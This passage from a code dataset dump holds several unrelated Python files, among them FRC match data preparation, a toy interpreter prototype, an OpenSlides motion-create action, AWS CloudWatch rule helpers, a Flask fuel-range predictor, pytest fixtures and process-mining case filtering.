dictionary for easy access\nbg_data = {}\nindex = 0\nfor count in range(len(nc_teams)):\n bg_data[nc_teams[count]] = Team.compile_stats(nc_teams[count])\n print(\"Finished Team #\", count)\nprint(\"Finished creating NC team dictionary\")\n\n# assemble training data\nfor event in nc_events:\n myMatch = MatchQM(event)\n all_matches = tba._fetch('event/%s/matches' % (event))\n # 6 teams, 10 features\n mtch_dta = np.empty((6, 10))\n for match in all_matches:\n match_num = match['match_number']\n print(match_num)\n red_teams, blue_teams = myMatch.get_teams(match_num, 'red'), myMatch.get_teams(match_num, 'blue')\n for team in red_teams:\n if team in bg_data:\n for point in bg_data[team]:\n train_data_file.write(str(point) + ' ')\n train_data_file.write('\\n')\n print(bg_data[team])\n else:\n for point in range(10):\n train_data_file.write('0')\n train_data_file.write('\\n')\n print(\"----- Not an NC Team -----\")\n for team in blue_teams:\n if team in bg_data:\n for point in bg_data[team]:\n train_data_file.write(str(point) + ' ')\n train_data_file.write('\\n')\n print(bg_data[team])\n else:\n for point in range(10):\n train_data_file.write('0')\n train_data_file.write('\\n')\n print(\"----- Not an NC Team -----\")\n train_data_file.write('match\\n')\n print(\"Finished a match\")\n\n # training labels\n red_score = myMatch.red_total(match_num)\n blue_score = myMatch.blue_total(match_num)\n # 0 - red, 1 - blue\n score = blue_score / (blue_score + red_score)\n train_labels_file.write(str(score))\n train_labels_file.write(\"\\n\")\n print(\"------- FINISHED AN EVENT -------\")\n \ntrain_data_file.close()\ntrain_labels_file.close()","sub_path":"load-data-train.py","file_name":"load-data-train.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"46615562","text":"from hParsing import readFile, separate\nfrom sys import argv, exit\nimport selfmodule as m\n\"\"\"\nE = {P} arg {+ S}\n\"\"\"\n\npfx = {\"cd\":\"m.cd\",\"ls\":\"m.ls\",\"out\":\"m.out\"}\n\nvar = {\"pwd\":\"m.pwd()\",\"..\":\"\\\"..\\\"\"}\nsfx = [\"sort\",\"chop\",\"aslist\",\"dirs\",\"docs\",\"separated\",\"joined\"]\ninside = False\n\ndef Expression(code):\n ret = []\n i = 0\n while i < len(code):\n if code[i] == \"\\\"\":\n # the Word is a string. Jump to the next \\\"\n # \"...\"\n j = code[i+1:].index(\"\\\"\") + i + 1\n ret.append(\" \".join(code[i:j+1]))\n i = j\n elif code[i] in var:\n # Assigned variables are parsed as their value\n # [var-name] ===> [var-value]\n if i+1 < len(code):\n if code[i+1] == \"=\":\n # Unless it's a declaration\n # [var-name] = ... \n ret.append(code[i])\n else: ret.append(var[code[i]])\n else:\n ret.append(var[code[i]])\n elif code[i] == \"=\":\n # Variable declaration\n if i > 0 and i+1 < len(code):\n # [var-name] = [expression] \\n\n if not code[i-1].isdigit():\n j = code[i+1:].index(\"\\n\") + i + 1\n var[code[i-1]] = \"\".join(Expression(code[i+1:j]))\n ret.append(\"=\" + var[code[i-1]] + \"\\n\")\n i = j\n else: m.fatalError(\"VariableNameError\")\n else:\n m.fatalError(\"AssignmentError\")\n elif code[i] == \"+\":\n if i+1 < len(code):\n if code[i+1] in sfx:\n # Suffix gives extra variable parameters\n ret.append(code[i+1]+\"=True\")\n i+= 1\n else: m.fatalError(\"SuffixNameError\")\n else:\n print(\"SuffixPositionError\")\n exit()\n elif code[i] in pfx:\n # Prefix declaration, separate arguments with commas\n ret.append(pfx[code[i]]+\"(\")\n if \"\\n\" in code[i+1:]:\n j = code[i+1:].index(\"\\n\") + i + 1\n else: j = len(code) - 1\n # Arguments\n obj = SubExpression(code[i+1:j])\n if len(obj) > 0:\n ret.append(\",\".join(obj))\n ret[-1] += \")\"\n ret.append(\"\\n\")\n i = j\n else:\n ret.append(code[i])\n i+= 1\n return ret\n\ndef SubExpression(code):\n ret = Expression(code)\n if len(ret) <= 1: return ret\n else: return ret[:-1]\n\ndef Parse(code):\n ret = Expression(code)\n return ret\n\n\ncode = separate(readFile(argv[1]), \"\\\"=\")\nj = []\nfor i in code.split(\"\\n\"):\n j+=(i.split()+[\"\\n\"])\nj.append(\"\\n\")\nprint(\"Executing...\")\ng = \"\".join(Parse(j))\nprint(\"Returned: \\n\"+g)\ntry:\n exec(g)\nexcept:\n print(\":[\")","sub_path":"Prototypes/self/P0/selfP0.py","file_name":"selfP0.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442495012","text":"#! usr/bin/python\n# coding=utf-8\n\nimport time\n\n\nclass SoundUtils:\n\n @classmethod\n def bell(cls, _time, _time_step):\n \"\"\"\n 响铃_time次,每次间隔_time_step秒\n :param _time:\n :param _time_step:\n :return:\n \"\"\"\n for i in range(_time):\n print(\"\\a\")\n time.sleep(_time_step)\n","sub_path":"r_utils/sound_utils.py","file_name":"sound_utils.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"171235494","text":"\n\"\"\"\nAn interface to the main iADC control register. The one at address 0.\n\nContains some methods for modifying the parameters of this register\n\"\"\"\n\nclass IAdcRegistersControl:\n def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n \"\"\" The control register created by default is designed to sample the I Q channels\n independantly (ie: each get RF input gets sampled by its core) and in phase.\n\n analogue_selection -- 'indep', 'inter_I' or 'inter_Q'. See #set_analogue_selection.\n clock_selection -- 'in', 'quad' or 'neg'. See #set_clock_selection\n cal_mode -- 'no_cal', 'new_cal', or 'keep_last_cal'.\n clk_speed -- clock speed in MHz\n \"\"\"\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)\n\n def set_analogue_selection(self, mode):\n \"\"\"\n Specifies how the RF channels will be connected to the ADC cores.\n Either independant or one channel interleaved\n\n mode --\n indep: InI -> ADCI ; InQ -> ADCQ\n inter_I: InI -> ADCI ; InI -> ADCQ\n inter_Q: InQ -> ADCI ; InQ -> ADCQ\n \"\"\"\n bits_map = {'inter_Q': 0b00, 'inter_I': 0b10, 'indep': 0b11}\n self.value &= ~(0b11 << 4)\n self.value |= (bits_map[mode] << 4)\n\n def set_clock_selection(self, mode):\n \"\"\"\n Specifies the phase between each core's clock\n\n mode --\n in: in phase.\n quad: quadtrature\n neg: 180 degree phase shift (negative)\n \"\"\"\n bit_map = {'neg': 0b00, 'in': 0b10, 'quad': 0b11}\n self.value &= ~(0b11 << 6) # clear bits 7 downto 6\n self.value |= (bit_map[mode] << 6) \n\n def set_cal_mode(self, mode):\n \"\"\"\n Set to no_cal to be able to modify the XXXX registers manually\n\n cal -- 'no_cal', 'new_cal' or 'keep_last_cal'\n \"\"\"\n bits_map = {'no_cal': 0b00, 'keep_last_cal': 0b01, 'new_cal': 0b11}\n # clear bits 10 and 11\n self.value &= ~(0b11 << 10)\n # set bits as per specification\n self.value |= (bits_map[mode] << 10)\n","sub_path":"iadc_registers_control.py","file_name":"iadc_registers_control.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468495065","text":"import time\nfrom typing import Any, Dict\n\nfrom ....models.models import Motion\nfrom ....shared.exceptions import ActionException\nfrom ....shared.patterns import POSITIVE_NUMBER_REGEX, Collection, FullQualifiedId\nfrom ....shared.schema import id_list_schema, optional_id_schema\nfrom ...mixins.create_action_with_dependencies import CreateActionWithDependencies\nfrom ...util.default_schema import DefaultSchema\nfrom ...util.register import register_action\nfrom ..agenda_item.agenda_creation import (\n CreateActionWithAgendaItemMixin,\n agenda_creation_properties,\n)\nfrom ..agenda_item.create import AgendaItemCreate\nfrom ..list_of_speakers.create import ListOfSpeakersCreate\nfrom ..list_of_speakers.list_of_speakers_creation import (\n CreateActionWithListOfSpeakersMixin,\n)\nfrom ..motion_submitter.create import MotionSubmitterCreateAction\nfrom .sequential_numbers_mixin import SequentialNumbersMixin\nfrom .set_number_mixin import SetNumberMixin\n\n\n@register_action(\"motion.create\")\nclass MotionCreate(\n CreateActionWithDependencies,\n CreateActionWithAgendaItemMixin,\n SequentialNumbersMixin,\n SetNumberMixin,\n CreateActionWithListOfSpeakersMixin,\n):\n \"\"\"\n Create Action for motions.\n \"\"\"\n\n model = Motion()\n schema = DefaultSchema(Motion()).get_create_schema(\n optional_properties=[\n \"meeting_id\",\n \"title\",\n \"number\",\n \"state_extension\",\n \"sort_parent_id\",\n \"category_id\",\n \"block_id\",\n \"supporter_ids\",\n \"tag_ids\",\n \"attachment_ids\",\n \"origin_id\",\n \"text\",\n \"lead_motion_id\",\n \"statute_paragraph_id\",\n \"reason\",\n ],\n required_properties=[\"meeting_id\", \"title\"],\n additional_optional_fields={\n \"workflow_id\": optional_id_schema,\n \"submitter_ids\": id_list_schema,\n **Motion().get_property(\"amendment_paragraph_$\", POSITIVE_NUMBER_REGEX),\n **agenda_creation_properties,\n },\n )\n dependencies = [AgendaItemCreate, ListOfSpeakersCreate]\n\n def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:\n # special check logic\n if instance.get(\"lead_motion_id\"):\n if instance.get(\"statute_paragraph_id\"):\n raise ActionException(\n \"You can't give both of lead_motion_id and statute_paragraph_id.\"\n )\n if not instance.get(\"text\") and not instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"Text or amendment_paragraph_$ is required in this context.\"\n )\n if instance.get(\"text\") and instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"You can't give both of text and amendment_paragraph_$\"\n )\n if instance.get(\"text\") and \"amendment_paragraph_$\" in instance:\n del instance[\"amendment_paragraph_$\"]\n if instance.get(\"amendment_paragraph_$\") and \"text\" in instance:\n del instance[\"text\"]\n else:\n if not instance.get(\"text\"):\n raise ActionException(\"Text is required\")\n if instance.get(\"amendment_paragraph_$\"):\n raise ActionException(\n \"You can't give amendment_paragraph_$ in this context\"\n )\n\n # fetch all needed settings and check reason\n meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), instance[\"meeting_id\"]),\n [\n \"motions_default_workflow_id\",\n \"motions_default_amendment_workflow_id\",\n \"motions_default_statute_amendment_workflow_id\",\n \"motions_reason_required\",\n ],\n )\n if meeting.get(\"motions_reason_required\") and not instance.get(\"reason\"):\n raise ActionException(\"Reason is required\")\n\n # calculate state_id from workflow_id\n workflow_id = instance.pop(\"workflow_id\", None)\n if workflow_id is None:\n if instance.get(\"lead_motion_id\"):\n workflow_id = meeting.get(\"motions_default_amendment_workflow_id\")\n elif instance.get(\"statute_paragraph_id\"):\n workflow_id = meeting.get(\n \"motions_default_statute_amendment_workflow_id\"\n )\n else:\n workflow_id = meeting.get(\"motions_default_workflow_id\")\n if workflow_id:\n workflow = self.datastore.get(\n FullQualifiedId(Collection(\"motion_workflow\"), workflow_id),\n [\"first_state_id\"],\n )\n instance[\"state_id\"] = workflow.get(\"first_state_id\")\n else:\n raise ActionException(\n \"No matching default workflow defined on this meeting\"\n )\n\n # check for origin_id\n if instance.get(\"origin_id\"):\n meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), instance[\"meeting_id\"]),\n [\"committee_id\"],\n )\n forwarded_from = self.datastore.get(\n FullQualifiedId(Collection(\"motion\"), instance[\"origin_id\"]),\n [\"meeting_id\"],\n )\n forwarded_from_meeting = self.datastore.get(\n FullQualifiedId(Collection(\"meeting\"), forwarded_from[\"meeting_id\"]),\n [\"committee_id\"],\n )\n committee = self.datastore.get(\n FullQualifiedId(\n Collection(\"committee\"), forwarded_from_meeting[\"committee_id\"]\n ),\n [\"forward_to_committee_ids\"],\n )\n if meeting[\"committee_id\"] not in committee.get(\n \"forward_to_committee_ids\", []\n ):\n raise ActionException(\n f\"Committee id {meeting['committee_id']} not in {committee.get('forward_to_committee_ids', [])}\"\n )\n\n # create submitters\n submitter_ids = instance.pop(\"submitter_ids\", None)\n if not submitter_ids:\n submitter_ids = [self.user_id]\n self.apply_instance(instance)\n action_data = []\n for user_id in submitter_ids:\n action_data.append({\"motion_id\": instance[\"id\"], \"user_id\": user_id})\n self.execute_other_action(MotionSubmitterCreateAction, action_data)\n\n instance[\"sequential_number\"] = self.get_sequential_number(\n instance[\"meeting_id\"]\n )\n # set created and last_modified\n timestamp = round(time.time())\n instance[\"created\"] = timestamp\n instance[\"last_modified\"] = timestamp\n self.set_number(\n instance,\n instance[\"meeting_id\"],\n instance[\"state_id\"],\n instance.get(\"lead_motion_id\"),\n instance.get(\"category_id\"),\n )\n\n return instance\n","sub_path":"openslides_backend/action/actions/motion/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"598111104","text":"import boto3 \nimport json\nimport os\n\n\n## Declare resources and clients: \nevents = boto3.client('events')\n\n# 1. Run CreateRole to attach a trust agreement to a role. \n# 2. Run CreatePolicy to create a new managed policy from the policy document. \n# 3. Load in the role to a new object, and Run attach policy to attach the policy we created in step 2. \n# 4. Use the role to generate cloudwatch event calls. \n\n## Create event rule: \ndef put_instance_rule(instance_id):\n event_pattern = {\n \"source\": [\"aws.ec2\"],\n \"detail-type\": [\"EC2 Instance State-change Notification\"],\n \"detail\":{\n \"state\":[\"running\",\"stopped\",'shutting-down'],\n \"instance-id\":[instance_id]}}\n ep_encoded = json.dumps(event_pattern)\n name = \"Monitor\"+instance_id\n print('environ_param',os.environ)\n response = events.put_rule(\n Name = name,\n EventPattern = ep_encoded,\n State = 'ENABLED',\n Description = 'on-the-fly monitoring setup for instance '+instance_id,\n RoleArn =os.environ['cwrolearn'])\n return response,name\n\n## Create target: \ndef put_instance_target(rulename):\n response = events.put_targets(\n Rule = rulename,\n Targets = [\n {\n 'Arn':os.environ['figlambarn'],\n 'Id':os.environ['figlambid']}])\n return response\n\n","sub_path":"sam_locanmf_stack/.aws-sam/build/S3DelObjectFunction/utilsparam/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"348893316","text":"# Load libraries\nfrom threading import Timer\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport requests\nfrom flask import Flask, jsonify\n\nimport json\n\nfrom json import JSONEncoder\n\nimport time\n\n\nclass NumpyArrayEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return JSONEncoder.default(self, obj)\n\n\nclass RepeatedTimer(object):\n def __init__(self, interval, function, *args, **kwargs):\n self._timer = None\n self.interval = interval\n self.function = function\n self.args = args\n self.kwargs = kwargs\n self.is_running = False\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)\n\n def start(self):\n if not self.is_running:\n self._timer = Timer(self.interval, self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False\n\n\napp = Flask(__name__)\n\ndistance = 0\nfuel = 0\n\n\n@app.route('/cloud/can_go', methods=['GET'])\n# @cache.cached(timeout=300)\ndef speed_data():\n\n start_time = time.time()\n number_array = model_train()\n numpyData = {\"array\": number_array}\n encodedNumpyData = json.dumps(numpyData, cls=NumpyArrayEncoder) # use dump() to write array into file\n print(\"---y_train %s seconds ---\" % (time.time() - start_time))\n return encodedNumpyData\n\n\ndef get_ac_control_data():\n try:\n req = requests.get(\"http://localhost:3103/ac_control/output\")\n decodedArrays = json.loads(req.text)\n\n finalNumpyArray = np.asarray(decodedArrays[\"array\"])\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n return finalNumpyArray\n\n\ndef get_speed_data():\n try:\n req = requests.get(\"http://localhost:3202/speed/output\")\n decodedArrays = json.loads(req.text)\n\n finalNumpyArray = np.asarray(decodedArrays[\"array\"])\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n return finalNumpyArray\n\n\ndef get_amount_fuel_data():\n global distance, fuel\n\n try:\n req = requests.get(\"http://localhost:6201/cloud/get_mobile_data\")\n decodedArrays = json.loads(req.text)\n\n distance = float(decodedArrays[\"distance\"])\n fuel = float(decodedArrays[\"fuel\"])\n\n print(distance)\n print(fuel)\n\n except requests.exceptions.ConnectionError:\n return \"Service unavailable\"\n\n\ndef model_train():\n global distance, fuel\n\n get_amount_fuel_data()\n\n # speed_output = [float(i) for i in get_speed_data()]\n # ac_output = [float(i) for i in get_ac_control_data()]\n #\n # print(len(speed_output))\n # print(len(ac_output))\n #\n # if len(speed_output) > len(ac_output):\n # min = len(ac_output)\n # else:\n # min = len(speed_output)\n #\n # X = np.array((speed_output[:min], ac_output[:min])).T\n #\n # df = pd.DataFrame(X)\n #\n # print(\"df\")\n # print(df)\n\n dataset = pd.read_csv(\"datasettt.csv\")\n df = dataset.iloc[:, [0, 1]]\n\n print(df)\n\n kmeans = KMeans(n_clusters=4, random_state=0)\n kmeans = kmeans.fit(df)\n\n df['labels'] = kmeans.labels_\n print(df['labels'].values.tolist())\n # interpretation of cluster values\n l = len(kmeans.labels_)\n for i in range(l):\n if kmeans.labels_[i] == 3:\n kmeans.labels_[i] = 1\n\n elif kmeans.labels_[i] == 0:\n kmeans.labels_[i] = 3\n\n elif kmeans.labels_[i] == 2:\n kmeans.labels_[i] = 4\n\n elif kmeans.labels_[i] == 1:\n kmeans.labels_[i] = 2\n\n df['labels'] = kmeans.labels_\n y = df['labels'].values\n\n array = df.values\n X = array[:, 0:2]\n\n # split the data set\n X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=0)\n\n # Make predictions for validating dataset\n model = LogisticRegression(solver='liblinear', multi_class='ovr')\n model.fit(X_train, Y_train)\n predictions = model.predict(X_validation)\n\n # Evaluate predictions\n print('Accuracy: ', accuracy_score(Y_validation, predictions))\n\n print('confusion_matrix: ')\n print(confusion_matrix(Y_validation, predictions))\n\n print('classification_report: ')\n print(classification_report(Y_validation, predictions))\n\n ###############check whether the vehicle can reach to the destination or not?################\n predict = model.predict([[4, 2]])\n print(predict)\n # distance = 250\n # litre = 20\n\n if predict == 1:\n rate = 11\n elif predict == 2:\n rate = 12.5\n elif predict == 3:\n rate = 13.5\n elif predict == 4:\n rate = 15\n\n output = rate * fuel\n\n if output >= distance:\n print(1)\n return 1\n elif output < distance:\n print(0)\n return 0\n\n\n# passenger_data_automated = RepeatedTimer(5, get_passenger_count_data)\n\nif __name__ == '__main__':\n app.run(port=6202, host='0.0.0.0')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"428450042","text":"class Solution:\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n if not nums:\n return\n\n i1 = len(nums) - 1\n while i1 >= 1:\n if nums[i1 - 1] < nums[i1]:\n break\n i1 -= 1\n\n print(i1)\n i2 = len(nums) - 1\n if i1 != 0:\n while i2 >= i1:\n if nums[i1-1] < nums[i2]:\n nums[i1-1], nums[i2] = nums[i2], nums[i1-1]\n break\n i2 -= 1\n\n nums[i1::] = list(reversed(nums[i1:]))\n\ns = Solution()\ns.nextPermutation([1,2,3,9,8,6])\n\n# 在当前序列中,从尾端往前寻找两个相邻元素,前一个记为first,后一个记为second,\n# 并且满足first 小于 second。然后再从尾端寻找另一个元素number,如果满足first 小于number,\n# 即将第first个元素与number元素对调,并将second元素之后(包括second)的所有元素颠倒排序,即求出下一个序列\n\n# example:\n# 6,3,4,9,8,7,1\n# 此时 first = 4,second = 9\n# 从尾巴到前找到第一个大于first的数字,就是7\n# 交换4和7,即上面的swap函数,此时序列变成6,3,7,9,8,4,1\n# 再将second=9以及以后的序列重新排序,让其从小到大排序,使得整体最小,即reverse一下(因为此时肯定是递减序列)\n# 得到最终的结果:6,3,7,1,4,8,9\n","sub_path":"solutions/array/problem31_Next Permutation.py","file_name":"problem31_Next Permutation.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"233591825","text":"import pytest\nfrom allure_commons_test.report import AllureReport\nfrom doctest import script_from_examples\nimport mock\nimport allure_commons\nfrom contextlib import contextmanager\nfrom allure_commons.logger import AllureMemoryLogger\n\npytest_plugins = \"pytester\"\n\n\ndef pytest_configure(config):\n config.addinivalue_line(\n \"markers\", \"real_logger: mark test to run with a real allure logger\"\n )\n\n\n@contextmanager\ndef fake_logger(path, logger):\n blocked_plugins = []\n for name, plugin in allure_commons.plugin_manager.list_name_plugin():\n allure_commons.plugin_manager.unregister(plugin=plugin, name=name)\n blocked_plugins.append(plugin)\n\n with mock.patch(path) as ReporterMock:\n ReporterMock.return_value = logger\n yield\n\n for plugin in blocked_plugins:\n allure_commons.plugin_manager.register(plugin)\n\n\nclass AlluredTestdir:\n def __init__(self, testdir, request):\n self.testdir = testdir\n self.request = request\n self.allure_report = None\n\n def parse_docstring_source(self):\n docstring = self.request.node.function.__doc__ or self.request.node.module.__doc__\n source = script_from_examples(docstring).replace(\"#\\n\", \"\\n\")\n self.testdir.makepyfile(source)\n\n def parse_docstring_path(self):\n doc_file = self.request.node.function.__doc__ or self.request.node.module.__doc__\n example_dir = self.request.config.rootdir.join(doc_file.strip())\n with open(example_dir, encoding=\"utf-8\") as f:\n content = f.read()\n source = script_from_examples(content)\n self.testdir.makepyfile(source)\n\n def run_with_allure(self, *args, **kwargs):\n if self.request.node.get_closest_marker(\"real_logger\"):\n self.testdir.runpytest(\"--alluredir\", self.testdir.tmpdir, *args, **kwargs)\n self.allure_report = AllureReport(self.testdir.tmpdir.strpath)\n else:\n self.allure_report = AllureMemoryLogger()\n with fake_logger(\"allure_pytest.plugin.AllureFileLogger\", self.allure_report):\n self.testdir.runpytest(\"--alluredir\", self.testdir.tmpdir, *args, **kwargs)\n\n return self.allure_report\n\n\n@pytest.fixture\ndef allured_testdir(testdir, request):\n return AlluredTestdir(testdir, request)\n\n\n@pytest.fixture\ndef executed_docstring_source(allured_testdir):\n allured_testdir.parse_docstring_source()\n allured_testdir.run_with_allure()\n return allured_testdir\n\n\n@pytest.fixture\ndef executed_docstring_path(allured_testdir):\n allured_testdir.parse_docstring_path()\n allured_testdir.run_with_allure()\n return allured_testdir\n","sub_path":"allure-pytest/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"576261417","text":"import pandas as pd\n\ndef drop_partial(df, dataset):\n '''function for dropping partial cases'''\n if dataset == \"BPI_Challenge_2012-training.csv\" or dataset == \"BPI_Challenge_2012-test.csv\":\n print(\"drop partial cases of\", dataset)\n # select last events of each case\n last_data = df.copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby(['event concept:name', 'event lifecycle:transition']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_last.groupby(['event concept:name', 'event lifecycle:transition']).count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'W_Valideren aanvraag') & (\n df_last['event lifecycle:transition'] == 'COMPLETE')\n bool2 = (df_last['event concept:name'] == 'A_DECLINED')\n bool3 = (df_last['event concept:name'] == 'A_CANCELLED')\n bool4 = (df_last['event concept:name'] == 'A_ACTIVATED')\n bool5 = (df_last['event concept:name'] == 'W_Afhandelen leads') # extra\n bool6 = (df_last['event concept:name'] == 'W_completeren aanvraag') # extra\n bool7 = (df_last['event concept:name'] == 'W_Nabellen offertes') & (\n df_last['event lifecycle:transition'] == 'COMPLETE') # extra\n df_last_no_partial = df_last[bool1 + bool2 + bool3 + bool4 + bool5 + bool6 + bool7]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"Road_Traffic_Fine_Management_Process-training.csv\" or \\\n dataset == \"Road_Traffic_Fine_Management_Process-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df.copy()\n boolean_last = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean_last]\n df_last['event'] = 'last'\n\n # select second last events of each case\n df_no_last = pd.concat([df, df_last]).drop_duplicates(keep=False)\n df_no_last = df[~df['eventID '].isin(list(df_last['eventID ']))]\n\n boolean_sec_last = ~df_no_last.duplicated(['case concept:name'], keep='last')\n df_sec_last = df_no_last[boolean_sec_last]\n df_sec_last['event'] = 'second_last'\n\n # make dataframe with the two last events of each case\n df_two_lasts = pd.concat([df_sec_last, df_last])\n df_two_lasts = df_two_lasts.reset_index()\n\n # get more insight\n df_group = df_two_lasts.groupby(['event concept:name', 'event']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_two_lasts.groupby(['event concept:name', 'event']).count().sum()['eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_two_lasts['event'] == 'last') & (df_two_lasts['event concept:name'] == 'Send for Credit Collection')\n bool2 = (df_two_lasts['event'] == 'last') & (df_two_lasts['event concept:name'] == 'Payment')\n bool3 = (df_two_lasts['event'] == 'last') & (df_two_lasts['event concept:name'] == 'Send Fine')\n bool4 = (df_two_lasts['event'] == 'second_last') & (df_two_lasts['event concept:name'] == 'Payment')\n\n df_pay_credit = df_two_lasts[bool1 + bool2]\n df_pay_fine = df_two_lasts[bool3 + bool4].sort_values(by='case concept:name', ascending=True)\n counts = df_pay_fine['case concept:name'].value_counts()\n df_pay_fine = df_pay_fine[df_pay_fine['case concept:name'].isin(counts.index[counts > 1])]\n df_fine = df_pay_fine[df_pay_fine['event'] == 'last']\n\n df_last_no_partial = pd.concat([df_fine, df_pay_credit])\n df_last_no_partial\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI Challenge 2017-training.csv\" or dataset == \"BPI Challenge 2017-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df[['eventID ', 'case concept:name', 'event concept:name', 'event lifecycle:transition',\n 'event time:timestamp']].copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby('event concept:name').count()\n df_group['percentage'] = (df_group['eventID '] / df_last.groupby('event concept:name').count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'O_Cancelled')\n bool2 = (df_last['event concept:name'] == 'W_Validate application') & (\n df_last['event lifecycle:transition'] == 'complete')\n bool3 = (df_last['event concept:name'] == 'W_Vallidate application') & (\n df_last['event lifecycle:transition'] == 'ate_abort')\n bool4 = (df_last['event concept:name'] == 'W_Call after offers') & (\n df_last['event lifecycle:transition'] == 'complete') # extra\n bool5 = (df_last['event concept:name'] == 'W_Call after offers') & (\n df_last['event lifecycle:transition'] == 'ate_abort') # extra\n bool6 = (df_last['event concept:name'] == 'W_Complete application') & (\n df_last['event lifecycle:transition'] == 'complete')\n bool7 = (df_last['event concept:name'] == 'W_Complete application') & (\n df_last['event lifecycle:transition'] == 'ate_abort')\n df_last_no_partial = df_last[bool1 + bool2 + bool3 + bool4 + bool5 + bool6 + bool7]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI Challenge 2018-training.csv\" or dataset == \"BPI Challenge 2018-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df[['eventID ', 'case concept:name', 'event concept:name', 'event lifecycle:transition',\n 'event time:timestamp']].copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby(['event concept:name', 'event lifecycle:transition']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_last.groupby(['event concept:name', 'event lifecycle:transition']).count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'finish payment')\n df_last_no_partial = df_last[bool1]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI_Challenge_2019-training.csv\" or dataset == \"BPI_Challenge_2019-test.csv\":\n print(\"drop partial cases of\", dataset) \n if dataset == \"BPI Challenge 2019-training.csv\":\n # remove wrong dates\n df_wrongdate = df[df['event time:timestamp'].dt.year != 2018]\n wrongdates = df_wrongdate['case concept:name'].unique()\n df = df.loc[~df['case concept:name'].isin(wrongdates)]\n\n # make 4 categories of the dataset\n threewaybefore = df[df['case Item 